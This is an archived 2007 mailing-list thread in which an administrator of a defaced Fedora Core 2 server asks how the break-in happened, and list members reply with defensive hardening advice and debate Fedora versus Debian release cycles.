Re: Hacked server
On 4/8/07, Orr Dunkelman [EMAIL PROTECTED] wrote: You will also need to install everything from scratch (and I suggest you init. your bios as well). Flashing your BIOS for no real need (and the attack you're talking about is purely theoretical) is calling for trouble. While it's fun to play the how can you totally 0wn a server? mental game, let's stick to what's really done in real life attacks. Try running them (including the web server itself) in chroot. Alternatively, at least consider limiting Apache a bit: 1) Run it with an SELinux policy (FC3 and upwards supports SELinux; not sure about FC2) 2) Limit, with iptables uid-owner/gid-owner rules, the network sites which Apache can initiate a connection to. While this will add a maintenance overhead for web apps which pull data from remote servers, it'll also break many common attacks, e.g.: - some pre-made attack scripts rely on making, say, your broken PHP webapp, download the full-fledged backdoor program from a remote server owned by the attacker - one reason to attack might be to set up a spam zombie; By refusing outgoing traffic, it couldn't contact port 25 on other machines. Depending on your web apps, those limitations might be an unacceptable overhead. Or you might flex them a bit, e.g. chose to always allow port 80 but not other ports. Also, they don't aim to give hermetic security, just to cripple your environment just enough to frustrate an attacker or make your machine useless for his needs.
Re: Hacked server
On 4/8/07, Hetz Ben Hamo [EMAIL PROTECTED] wrote: You could do few things: 2. Have some logs emailed to you from the server on a daily basis (crontab). By default, Redhat/CentOS/Fedora does this automatically, but you can enhance it to send pack few log files and email them to you as .tar.bz2 for example. That way you could check whats going on to see who entered when etc.. (logs like ssh, httpd, sendmail). Ususally when you compress text files, they become small, so the email wouldn't be really big. That is impractical advise. No one has time the go by daily basis over the logs of every service, the only way your logs will prove to be useful that way is *after* the break in. You should be looking at logwatch. 3. Make sure your iptables/firewall settings will only let specific needs and nothing else comes in. nmap is your friend to check, along with stuff like SAINT etc. If you don't know firewall settings well, just ask here. I'm sure someone would happily assist you with it. Also, for user friendly firewall manipulation - http://www.fwbuilder.org/ 4. have a cron script that will backup your web server stuff nightly. If you don't have a tape backup or spare space for backup, then pack the essential parts and use the script to email it to you (GMail account can hold almost 3 gigs, so you can save the backup there) dirvish.org is a gift from guru(s). Hetz Maxim. -- Cheers, Maxim Veksler Free as in Freedom - Do u GNU ? = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
1. run it behind a decent firewall ( even pf,iptables logs should give you some idea about who's accessing your computer and using which service ) 2. dont run anything with root 3. run chrooted env's if possible 4. reinstall using something more updated system and dont install anything you dont need, skin it down 5. configure firewall and services ACL to allow remote access (SSH) or service level (BIND) access from known ips/networks 6. honeypots and monitoring scripts 7. rootkits 8. IDS can come in handy to alert you on hazardus actions on the server (snort?) 9. hide all information about application names and versions, same goes for OS, search for OS hardening guides On Sun, April 8, 2007 00:33, Ori Idan wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? What should I do to prevent such hackes in the future? -- Ori Idan !DSPAM:4618103d188168008797548! Best regards Baruch Shpirer http://www.shpirer.com Paranoids are people too, they have their own problems. It's easy to criticize, but if everybody hated you, you'd be paranoid too. D. J. Hicks = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
On Sunday, 8 בApril 2007 01:16, Amos Shapira wrote: Sticking to supported versions is rule number one in production networks (and plan ahead to switch to a later version well before the current one you use get's EOL'ed). Correct. Ori used FC2, while FC4 is already EOL many months. As far as I'm aware FC is just a beta for RedHat and I'm not even sure they promise to issue security patches for it. That's FUD. RedHat sponsors Fedora, but the project issues its own releases and patches. By supported I mean that the distro vendor promises to track the relevant security vulnerabilities in the included software and issue patched packages in a timely manner. Fedora do this promptly like any other free software distro (yes, I am a Fedora user as you can feel ;-) (Again - I'm not quite familiar with FC or RH but Debian makes all these suggestions uber easy). I run 'yum update' daily (you can do it via cron of course, but I prefer to do it manually). For production server you should reconsider your distribution of choice: Fedora is a fast paced distro like Debian testing, you get most bleeding edge software (that's why I stick with it) but you pay in almost daily updates and a short life cycle -- new release every 6 months and good maintenance of only 1.5 releases (~1 year). If you aim at free distribution with long term updates than you may either switch to Centos (a RedHat clone, so your learning curve should be easier), or switch to Debian stable (h... there's no point installing Sarge now, and Etch is due RSN(tm). -- Oron Peled Voice/Fax: +972-4-8228492 [EMAIL PROTECTED] http://www.actcom.co.il/~oron ICQ UIN: 16527398 Software is like Entropy: it's hard to grasp, weighs nothing and obeys the Second Law of Thermodynamics, i.e. it always increases -- Norman Augustine = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
Oron Peled wrote: Fedora is a fast paced distro like Debian testing I'm assuming you meant Debian Unstable Shachar -- Shachar Shemesh Lingnu Open Source Consulting ltd. Have you backed up today's work? http://www.lingnu.com/backup.html = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
I disagree, Debian Unstable (Sid) is an ever-updating, bleeding-edge distro: *tends to bring the latest version of each software*, while Fedora doesn't. For example, FC6 has Firefox 1.5, and 2.0 will never be there, only in FC7. Debian Testing is the next Debian Stable, like FC is the next RHEL. - Oren Shachar Shemesh wrote: Oron Peled wrote: Fedora is a fast paced distro like Debian testing I'm assuming you meant "Debian Unstable" Shachar = To unsubscribe, send mail to [EMAIL PROTECTED] with the word "unsubscribe" in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
On Sunday, 8 בApril 2007 13:59, Shachar Shemesh wrote: Oron Peled wrote: Fedora is a fast paced distro like Debian testing I'm assuming you meant Debian Unstable No, unless I missunderstood the Debian process. In Fedora untested packages first goes to the Rawhide repositories (which I think are the equivalent of Debian Unstable). Only later they filter into the official Fedora repositories. Fedora does not have an equivalent to Debian Stable (because that's what RedHat suppose to be when you pay them... ;-) BTW, as the Fedora project matures it naturally encounters the same challenges as any big community based distro. In that sense I see a lot of learning and copying from Debian (which is a good thing). Regretfully, it's not common enough and there are plenty of cases when the wrong wheels are poorly reinvented -- my (un)favorite is yum instead of using apt4rpm. Well, at least the official repositories are both yum/apt capable since FC5. Bye, -- Oron Peled Voice/Fax: +972-4-8228492 [EMAIL PROTECTED] http://www.actcom.co.il/~oron ICQ UIN: 16527398 Those who do not understand Unix are condemned to reinvent it, poorly. (H. Spencer) = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Hacked server
A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? What should I do to prevent such hackes in the future? -- Ori Idan
Re: Hacked server
Ori Idan wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 Didn't fedora stopped releasing security updates for this version a long time ago? -- Lior Kaplan [EMAIL PROTECTED] http://www.Guides.co.il = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
On Sun, 8 Apr 2007, Ori Idan wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? The httpd log files should have some clues. Without knowing the versions of software your running its hard to say if there are known vulns with the software your running, let alone unpublished flaws. What kind of web applications are running? What should I do to prevent such hackes in the future? There are lots of things you can do, like keep software up to date, remove unneeded services, audit web applications for flaws (though I am kind of partial to the last one ;) -- - Josh = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
I suggest, that you should scan for full open ports on your web site (all the port range), to see if that person have an open shell on your account. Regardless of that, please look for known vulnerabilities from the versions of every server on the machine, and also if the server runs any dynamic web apps, you should see if they do not have any problems .. (404 and any other error messages can give you a clue for what they where looking for). Anyway, I recommend you to install (from a clean install rather then to update, because you do not know the whole things that the attackers did) a newer version, such as fc 6 ... or something better such as Debian ;) Ido On 4/8/07, Ori Idan [EMAIL PROTECTED] wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? What should I do to prevent such hackes in the future? -- Ori Idan -- http://ik.homelinux.org/ = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
Indeed a remote exploit in the services is possible, and ofcourse each service can have a remote exploit... However, I'd be trying to eliminate the less-uber-cool-hacker possibilities: a. Bad local user (Bad user! spank him..) b. SSH remote login using a weak password which was just guessed (test123. Bad user again!). Also try to check for root kits... - Oren Ori Idan wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? What should I do to prevent such hackes in the future? -- Ori Idan = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
You could do few things: 1. apt-get dist-upgrade (or yum upgrade), or better - move to a stable distribution like CentOS. That way you'll have security fixes for at least 5 years. DO NOT use Fedora on any server which offfer services outside. 2. Have some logs emailed to you from the server on a daily basis (crontab). By default, Redhat/CentOS/Fedora does this automatically, but you can enhance it to send pack few log files and email them to you as .tar.bz2 for example. That way you could check whats going on to see who entered when etc.. (logs like ssh, httpd, sendmail). Ususally when you compress text files, they become small, so the email wouldn't be really big. 3. Make sure your iptables/firewall settings will only let specific needs and nothing else comes in. nmap is your friend to check, along with stuff like SAINT etc. If you don't know firewall settings well, just ask here. I'm sure someone would happily assist you with it. 4. have a cron script that will backup your web server stuff nightly. If you don't have a tape backup or spare space for backup, then pack the essential parts and use the script to email it to you (GMail account can hold almost 3 gigs, so you can save the backup there) 5. You can use applications like TripWire to detect if something changed, or you can simply do a simple MD5 check for your static pages, and if something goes wrong, it could email/SMS/send-a-pigeon to notify you :) Hope this helps, Hetz On 4/8/07, Ori Idan [EMAIL PROTECTED] wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? What should I do to prevent such hackes in the future? -- Ori Idan -- Skepticism is the lazy person's default position. Visit my blog (hebrew) for things that (sometimes) matter: http://wp.dad-answers.com = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
On 08/04/07, Josh Zlatin-Amishav [EMAIL PROTECTED] wrote: On Sun, 8 Apr 2007, Ori Idan wrote: What should I do to prevent such hackes in the future? There are lots of things you can do, like keep software up to date, remove unneeded services, audit web applications for flaws (though I am kind of partial to the last one ;) Sticking to supported versions is rule number one in production networks (and plan ahead to switch to a later version well before the current one you use get's EOL'ed). As far as I'm aware FC is just a beta for RedHat and I'm not even sure they promise to issue security patches for it. By supported I mean that the distro vendor promises to track the relevant security vulnerabilities in the included software and issue patched packages in a timely manner. Keeping services jailed would help too (even a simple chroot could help here) and generally segregated - minimizing amount of code running as root, possibly running web apps in their own user id, having firewalls on the server in addition to the network firewalls. Preparing to be able to re-build the machine from scratch (not just backups, but an automatic way to install the OS, all necessary packages and configuration files) would also help you just re-install a compromised system - because you can never know what easter egg your friendly neighborhood hacker has left behind. (Again - I'm not quite familiar with FC or RH but Debian makes all these suggestions uber easy). Lots more, depending on particular setup. --Amos
Re: Hacked server
On Sun, 8 Apr 2007, ik wrote: I suggest, that you should scan for full open ports on your web site (all the port range), to see if that person have an open shell on your account. Good advice, though the (possible) open shell might just be running on port 80/443 (i.e. a php shell) which is already open and behind a firewall. -- - Josh = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
On 08/04/07, Josh Zlatin-Amishav [EMAIL PROTECTED] wrote: On Sun, 8 Apr 2007, ik wrote: I suggest, that you should scan for full open ports on your web site (all the port range), to see if that person have an open shell on your account. Good advice, though the (possible) open shell might just be running on port 80/443 (i.e. a php shell) which is already open and behind a firewall. IMHO, if at all possible he should wipe the entire disk and re-install the system (including the boot record and stuff outside the filesystem address range). Short of that he will always be worried that there is yet another present left behind by the cracker. I've been through such a situation many years ago, with very low badget so everything was hosted on the same box and the managers too cheap to buy a separate firewall machine we kept being cracked by a script kiddy and I didn't know where to start patching the holes he exploited (and probably new ones he opened for himself). Without being able to re-install the system he just kept coming in despite all the cleanups. These days it's a matter of how much? 300$ and a days work to put up an extra temporary server while you re-install the main one? Most desktops are strong enough to host web sites so you might not even have to buy dedicated server hardware. --Amos
Re: Hacked server
On Sunday, 8 בApril 2007 00:33, Ori Idan wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? Based on your description, and on Internet statistics, I'd say: 1. Flawed PHP based application or code (photo album, forum, etc) 2. Flawed flash application (chat server) 3. Buggy apache. What should I do to prevent such hackes in the future? Run a supported release of OS. Be careful what webapps you run on your web server. Keep them up-to-date. Try running them (including the web server itself) in chroot. While this wont help if your app is broken, at least the attacker will be locked into a a chrooted environment. Audit your server, run tripwire and look at the daily logs for binaries or files that were changed. Read online and printed material about basic system administration and security practices. Based on your questions, you need an overall understanding of how to run a system in a secure manner. --Ariel -- Ariel Biener *.il EFnet Admin PGP: http://www.tau.ac.il/~ariel/pgp.html To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
Re: Hacked server
sendmail bind are also bad for your mental health. Consider normal alternatives, or if you want to make sure no one is hacking your system through them, switch to qmail and djbdns. You will also need to install everything from scratch (and I suggest you init. your bios as well). If you want to do a real forensics, you'll need to freeze the system, and stop touching anything there. Not sure it'll help you a lot (you already know that the guy is from Libia, and I'm not sure you can ask the Libian police to arrest him for that). just my 2 euro cents, Orr. On 4/7/07, Ori Idan [EMAIL PROTECTED] wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? What should I do to prevent such hackes in the future? -- Ori Idan -- Orr Dunkelman, [EMAIL PROTECTED], [EMAIL PROTECTED] Any human thing supposed to be complete, must for that reason infallibly be faulty -- Herman Melville, Moby Dick. Spammers: http://vipe.technion.ac.il/~orrd/spam.html GPG fingerprint: C2D5 C6D6 9A24 9A95 C5B3 2023 6CAB 4A7C B73F D0AA (This key will never sign Emails, only other PGP keys.)
Re: Hacked server
Adding to what's been said so far (and if repeating please consider it as double emphasis :-) I'd recommend: 1. Do not run anything not needed on the server. Make sure to look not only in system services level but in the service level itself. E.g: run on the web server only what you need on it. I had a server hacked through some exploit in OpenWebMail application, revealed two weeks before the break in. This web mail application was only tested at the time, with no plans on implementation, but I still left it on the system... . If you do not need PHP, for example, remove/disable it altogether. If you do, carefully refer to security guides on the net. Yes, its all quite time consuming. 2. You must subscribe yourself to mailing lists dealing with security issues to get advisories on time (see (1) above for the reason). The minimum is from your distro (every distro has such) but I wouldn't settle for this only but subscribe also to mailing lists about the services on your system (again, system level services and more granular services like web applications and other stuff you have on this server). Boaz. Ori Idan wrote: A server I managed was hacked by a libian hacker. The only thing he did was changing the index.html of some web sites. The server is based on fedora core 2 running: httpd sendmail bind proftp (through xinetd) ssh Any ideas how he could have done it? What should I do to prevent such hackes in the future? -- Ori Idan = To unsubscribe, send mail to [EMAIL PROTECTED] with the word unsubscribe in the message body, e.g., run the command echo unsubscribe | mail [EMAIL PROTECTED]
